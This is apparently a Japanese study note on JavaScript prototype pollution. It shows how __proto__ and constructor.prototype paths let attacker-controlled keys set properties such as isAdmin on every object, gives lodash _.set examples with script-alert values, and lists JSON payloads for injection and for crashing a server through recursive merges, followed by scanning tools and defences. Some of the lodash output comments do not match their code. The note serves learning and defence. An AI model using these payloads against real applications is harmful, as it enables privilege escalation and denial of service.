# プロトタイプ汚染

## 基本

```javascript
// Prototype for User
let userPrototype = {
  greet: function () {
    return `Hello, ${this.name}!`;
  },
};

// User Constructor Function
function UserProfilePrototype(name, age, followers, dob) {
  let user = Object.create(userPrototype);
  user.name = name;
  user.age = age;
  user.followers = followers;
  user.dob = dob;
  return user;
}

// Creating an instance
let regularUser = UserProfilePrototype("Ben S", 25, 1000, "1/1/1990");

// Using the prototype method
console.log(regularUser.greet());
```

プロトタイプ関数の実装を上書きする

```javascript
ben.__proto__.introduce = function () {
  console.log("You've been hacked, I'm Bob");
};
console.log(ben.introduce());
```

## 重要なパターン

```javascript
// ben[x][y] = val を利用
ben["__proto__"]["introduce"] = function () {
  return "hello gold1";
};
```

```javascript
let Person = {};

// 攻撃者が制御できる変数
let x = "constructor";
let y = "prototype";
let z = "isAdmin";
let val = true;

// プロトタイプ汚染を実行
Person[x][y][z] = val;

// 結果：すべてのオブジェクトに影響
let obj1 = {};
let obj2 = {};

console.log(obj1.isAdmin); // true
console.log(obj2.isAdmin); // true
console.log({}.isAdmin); // true
```

## Lodash

攻撃側からみても便利なライブラリ

```javascript
const obj = {};
_.set(obj, "a.b.c", "<script>alert('anycontent')</script>");
console.log(obj);
// 結果: { a: { b: { c: 42 } } }

const obj = {};
_.set(obj, "isAdmin", true);
console.log(obj.isAdmin);
// true

const arr = {};
_.set(arr, "x[0].y", "<script>alert('anycontent')</script>");
console.log(arr);
// 結果: { x: [ { y: 99 } ] }
```

## 再帰マージ

サーバー側でユーザー入力を再帰マージしているしている場合、プロパティを注入できるかもしれない

### インジェクション

```json
{ "__proto__": { "newProperty": "value" } }
```

### DoS

toString 関数を呼び出したらクラッシュする

```json
{ "__proto__": { "toString": "Just crash the server" } }
```

## ツール

https://github.com/ajinabraham/nodejsscan

https://github.com/KathanP19/protoscan

https://github.com/dwisiswant0/ppfuzz

https://github.com/BlackFan/client-side-prototype-pollution

## セキュリティ

- 可能であればオブジェクトを不変にする
- カプセル化
- ユーザー入力のサニタイズ
- 依存関係の管理（セキュリティパッチ）
- セキュリティヘッダー（CSP）
